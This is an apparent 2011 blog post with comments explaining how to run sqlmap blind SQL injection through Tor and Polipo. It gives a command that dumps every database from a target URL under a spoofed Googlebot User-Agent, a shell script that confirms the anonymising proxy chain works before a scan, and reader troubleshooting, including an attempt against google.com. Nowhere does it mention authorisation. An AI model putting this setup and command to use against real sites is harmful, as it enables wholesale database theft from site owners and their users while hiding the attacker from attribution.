Thursday, April 14, 2011

sqlmap and tor

There is no better tool at the moment for blind SQL injection than sqlmap. If you don't use it you should definitely have a look at it. With the latest additions sqlmap supports Tor with a command line switch, --tor. The switch does not talk to Tor directly: sqlmap sends its requests to a local HTTP proxy (Polipo, set up below), which forwards them to Tor's SOCKS port, so both pieces have to be running before the switch does anything useful. Let's proceed with the installation. My system is Debian/Ubuntu based, but the installation is almost the same for any Unix based distribution. Following the instructions at https://www.torproject.org/docs/debian.html.en#ubuntu :

Add this line to your /etc/apt/sources.list file:

deb     http://deb.torproject.org/torproject.org <DISTRIBUTION> main

where you put the codename of your distribution (e.g. lenny, sid, maverick or whatever yours is) in place of <DISTRIBUTION>.

Then add the gpg key used to sign the packages by running the following commands at your command prompt:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

Now refresh your sources and install Tor by running the following commands (as root) at your command prompt:

apt-get update
apt-get install tor tor-geoipdb

Start Tor with /etc/init.d/tor start. Polipo is a separate package, so install it if it is not already there, then grab a copy of the Tor Browser Bundle's Polipo config file from https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf , rename or move the old /etc/polipo/config out of the way and put the configuration from the URL in its place. Restart Polipo with /etc/init.d/polipo restart. This step matters: the stock Debian config makes Polipo listen on port 8123 and fetch pages directly, while the Tor Browser config makes it listen on 127.0.0.1:8118 (the port sqlmap's --tor switch connects to) and forward everything to Tor's SOCKS port on 127.0.0.1:9050. With the wrong config sqlmap either cannot reach the proxy at all or, worse, goes through Polipo straight to the target without touching Tor.

Get sqlmap from the latest svn trunk (the project has since moved to git; https://github.com/sqlmapproject/sqlmap is its current home) using

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap

Now you can use sqlmap with --tor, for example with the following command (quote the URL so the shell does not treat ? or & in it as special characters):

~/sqlmap# ./sqlmap.py -u "http://URL/index.php?cata_id=1" --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Your requests will then reach the website from a Tor exit node, carrying a User-Agent that looks like Google's crawler. Two caveats: the User-Agent is cosmetic only, since anyone who checks the source address against Google's published ranges or does a reverse lookup sees a Tor exit and not Googlebot, so the anonymity comes from Tor and not from the header; and --dump-all pulls every table of every database, which over Tor's latency takes a long time (sqlmap raises --time-sec on its own when --tor is given, which is why blind extraction gets slower, not faster).
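Before running that command it is worth confirming that the Polipo -> Tor chain actually works, which is exactly what comments 8 and 10 below stumble on. The script here is an added example, not code from the original post or from sqlmap: it reads a Polipo config file and reports whether sqlmap's --tor switch can reach Polipo and whether Polipo in turn forwards to Tor, then offers a live check against check.torproject.org. Assumptions: --tor expects an HTTP proxy at 127.0.0.1:8118 (the sqlmap 0.9 behaviour), Polipo's built-in defaults are 127.0.0.1:8123 with no parent proxy, Tor's SOCKS port is 127.0.0.1:9050, and the /api/ip endpoint on check.torproject.org is reachable; the sample configs written by demo are constructed for illustration, not real files from the post.

```shell
#!/bin/sh
# Added example (not from the original post or from sqlmap): check the
# Polipo -> Tor chain that sqlmap --tor depends on before starting a scan.

# Assumption: sqlmap --tor connects to this HTTP proxy address.
SQLMAP_TOR_PROXY="127.0.0.1:8118"
# Assumption: Tor's SOCKS listener, where Polipo must forward to.
TOR_SOCKS="127.0.0.1:9050"

# Print the value of a Polipo config key ($2) from file $1, skipping
# commented lines and stripping surrounding quotes. Prints nothing when
# the key is not set, so callers can apply Polipo's defaults.
polipo_get() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*\"\{0,1\}\([^\"[:space:]]*\)\"\{0,1\}.*/\1/p" "$1" | tail -n 1
}

# Effective listen address "host:port". Polipo defaults (assumed) are
# 127.0.0.1 and 8123, which is why a stock config is unreachable for --tor.
polipo_listen_addr() {
    host=$(polipo_get "$1" proxyAddress)
    port=$(polipo_get "$1" proxyPort)
    printf '%s:%s\n' "${host:-127.0.0.1}" "${port:-8123}"
}

# Effective upstream SOCKS proxy, or "direct" when Polipo would fetch the
# target itself and bypass Tor entirely.
polipo_parent() {
    parent=$(polipo_get "$1" socksParentProxy)
    printf '%s\n' "${parent:-direct}"
}

# Classify a config file:
#   wrong-port  sqlmap --tor cannot reach Polipo ("unable to connect to the
#               target url or proxy")
#   leak        Polipo answers on 8118 but forwards straight to the target,
#               so the scan works and nothing is anonymised
#   ok          listener and parent proxy both match the Tor setup
polipo_tor_status() {
    if [ "$(polipo_listen_addr "$1")" != "$SQLMAP_TOR_PROXY" ]; then
        echo wrong-port
    elif [ "$(polipo_parent "$1")" != "$TOR_SOCKS" ]; then
        echo leak
    else
        echo ok
    fi
}

# Live check (needs network, so demo does not call it): fetch the address
# check.torproject.org sees through the same HTTP proxy setting sqlmap --tor
# uses. "IsTor":true in the JSON answer means the whole chain is in place.
tor_exit_check() {
    curl -s -x "http://$SQLMAP_TOR_PROXY" https://check.torproject.org/api/ip
}

# Demo on two constructed config files (not real files from the post).
demo() {
    demo_stock=$(mktemp)
    demo_tor=$(mktemp)
    printf '# stock Debian config: every setting commented out\n# proxyPort = 8123\n' > "$demo_stock"
    printf 'proxyAddress = "127.0.0.1"\nproxyPort = 8118\nsocksParentProxy = "127.0.0.1:9050"\nsocksProxyType = socks5\n' > "$demo_tor"
    echo "stock config:         $(polipo_tor_status "$demo_stock")"
    echo "Tor Browser polipo.conf: $(polipo_tor_status "$demo_tor")"
    rm -f "$demo_stock" "$demo_tor"
}

demo
```

Run it against the real file with `polipo_tor_status /etc/polipo/config` after sourcing the script; only when that says ok is it worth spending a --dump-all run over Tor, and `tor_exit_check` confirms from the outside that the exit seen by the target is a Tor node rather than your own address.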

11 comments:

  1. sqlmap is fantastic. However, Havij is pretty good, too. I thought a lot of blind SQLi could be automated, but that's not realistic yet. You need to leverage many other resources and make sure to manually test every insertion point.

  2. I'm not using Debian or Ubuntu, so I ran the command like this and it's not working:

    sqlmap -u http://URL/index.php?cata_id=1 --dump-all -tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    [*] starting at: 17:09:15

    [17:09:15] [CRITICAL] there has been a file opening error for filename 'or'. Please check write permissions on a file and that it's not locked by another process.

    How can I fix?

    THANKS

  3. My bad, I forgot to add the path to Tor... :(

    OK, I run the command now like this and Tor starts:

    /home/foo/.tor-browser_en-US/start-tor-browser sqlmap -u http://URL/index.php?cata_id=1 --dump-all -tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    So how do we check if this is working or not?


    THANKS

  4. Hi, you are forgetting a dash "-" on the tor option: sqlmap -u http://URL/index.php?cata_id=1 --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    Should work for you.

  5. OK, but I'm trying to do this with the Linux Tor browser bundle, so can you do it this way, or do you have to do it by installing Tor?


    THANKS

  6. It's the same thing, just make sure that the Tor browser bundle is starting Tor and Polipo.

  7. With the Tor browser bundle you first start Vidalia, which then makes the connection and pops open Firefox after the connection is made... I don't believe the Tor browser bundle uses Polipo, I don't see it.

    I take it you use Linux, so it would be great if you grabbed the Tor browser bundle, tried this out and then let me know how you are starting this from the command line?


    THANKS

  8. This doesn't run as a user, I didn't read anywhere that you run this as root.

    This is what I have so far;

    sqlmap -u http://www.google.com/index.php?cata_id=1 --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    [*] starting at: 22:12:45

    [22:12:46] [INFO] using '/opt/sqlmap/output/www.google.com/session' as session file
    [22:12:46] [INFO] testing connection to the target url
    [22:12:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
    [22:12:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
    [22:12:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
    [22:12:49] [CRITICAL] unable to connect to the target url or proxy

    [*] shutting down at: 22:12:49


    SORRY I don't know what I'm doing, I'm just learning at the moment... :(

    If I leave it as http://URL/index.php?cata_id=1 I get this below...

    [CRITICAL] host 'URL' does not exist

    THANKS

  9. This is my problem for now: --tor to me means Tor lives in the /root path, like /usr/bin, and I have the Tor browser bundle in my $HOME;

    /home/foo/.tor

    So I don't see how --tor is going to do anything?

    THANKS

  10. I installed Tor and Polipo and I ran the command and nothing happens:

    sqlmap -u http://URL/index.php?cata_id=1 --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    Here's the output below, how can I fix this?

    [11:07:04] [WARNING] increasing default value for --time-sec to 10 because --tor switch was provided
    [11:07:04] [INFO] setting Tor proxy settings
    [11:07:04] [INFO] using '/opt/sqlmap/output/URL/session' as session file
    [11:07:04] [INFO] testing connection to the target url
    [11:07:08] [INFO] heuristics detected web page charset 'ascii'
    [11:07:08] [CRITICAL] unable to connect to the target url (504 - Gateway Timeout), sqlmap is going to retry the request
    [11:07:08] [WARNING] if the problem persists please check that the provided target url is valid. If it is, you can try to rerun with the --random-agent switch turned on and/or proxy switches (--ignore-proxy, --proxy,...)
    [11:07:11] [CRITICAL] unable to connect to the target url (504 - Gateway Timeout), sqlmap is going to retry the request
    [11:07:15] [CRITICAL] unable to connect to the target url (504 - Gateway Timeout), sqlmap is going to retry the request
    [11:07:21] [CRITICAL] unable to connect to the target url (504 - Gateway Timeout)
    [11:07:21] [WARNING] HTTP error codes detected during testing:
    504 (Gateway Timeout) - 4 times

    THANKS

    P.S. What change URL to an actual one I presume but it still does nothing...

    sqlmap -u http://www.googe.com/index.php?cata_id=1

  11. Hi, always use quotes "" around the URL; your command should be sqlmap -u "URL/index.php?cat_id=1". Also make sure that Polipo has the following options in its configuration file:
    proxyAddress = "127.0.0.1"
    proxyPort = 8118
